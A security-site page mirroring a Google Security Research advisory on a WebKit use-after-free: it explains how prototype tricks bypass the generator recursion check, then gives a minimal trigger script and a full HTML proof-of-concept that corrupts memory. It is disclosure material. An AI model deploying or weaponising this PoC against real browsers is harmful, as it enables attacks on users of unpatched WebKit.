首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WebKit - Use-After-Free when Resuming Generator
来源:Google Security Research 作者:Google 发布时间:2018-06-11  

<!--
In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:

    var state = this.@generatorState;

and set by calling:

    generator.@generatorState = @GeneratorStateExecuting;


Checking that the @generator property is set is also used in place of type checking the generator.

Therefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.

It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.

Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.

A minimal sample of the script causing this problem is below, and a full PoC is attached.

var iterator;

var a = [];

function* foo(index) {

  while (1) {
    var q = a.pop();
    if(q){
     q.__proto__ = iterator;
     q.next();
    }
    yield index++;
  }
}

function* foo2(){
    yield;
}

var temp = foo2(0);

for(var i = 0; i < 10; i++){ // make a few objects with @generatorState set
 var q = {};
 q.__proto__ = temp;
 q.next();
 q.__proto__ = {};
 a.push(q);

}

iterator = foo(0);

var q = {};
q.__proto__ = iterator;
print(q.next().value);
-->

<html><body><script>
print = console.log;
print("top");
var iterator;
var o = function(){print("hello")};
var a = [];
function* foo(index) {
  //print("start");

  while (1) {
    //if(index == 77){
      //  o = 0;
       // gc();       
// index = 2;
  //      var a = [1, 2, 3, 4];
 //yield 9;
        //print("a vale " + a[0]);
    //}
    //if(index == 1){
    //index = 77;
   // print("INTERNAL CALL")
   // iterator.next();
    //index++;

    //}
    //var b = [1, 2, 3, 4];
    var q = a.pop();
    if(q){
    print("here1");
    q.__proto__ = iterator;
    q.next();
    }
    yield index++;
    //print("bval" + b[0]);
  }
}

function* foo2(){

    yield;

}

var temp = foo2(0);

for(var i = 0; i < 10; i++){

 var q = {};
 q.__proto__ = temp;
 q.next();
 q.__proto__ = {};
 a.push(q);

}
//print(a);
iterator = foo(0);


// expected output: 0

 


o.__proto__ = iterator;
//print("FIRST CALL")
//print(o.next().value);
//print("SECOND CALL")
//print(o.next().value);
//print("THIRD CALL")

for(var i = 0; i < 10; i++){
var q = {};
q.__proto__ = iterator;
print(q.next("hello").value);
}

//print("FOURTH CALL")
//print(iterator.next().value);
o();
</script></body></html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Google Chrome - Integer Overfl
·XiongMai uc-httpd 1.0.0 - Buff
·WebKit - WebAssembly Compilati
·TrendMicro OfficeScan XG 11.0
·Apple macOS/iOS Kernel - Heap
·Apple macOS Kernel - Use-After
·PHP 7.2.2 - 'php_stream_url_wr
·WebKitGTK+ < 2.21.3 - Crash (P
·10-Strike Network Scanner 3.0
·10-Strike Network Inventory Ex
·10-Strike Network Inventory Ex
·WebKit - not_number defineProp
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved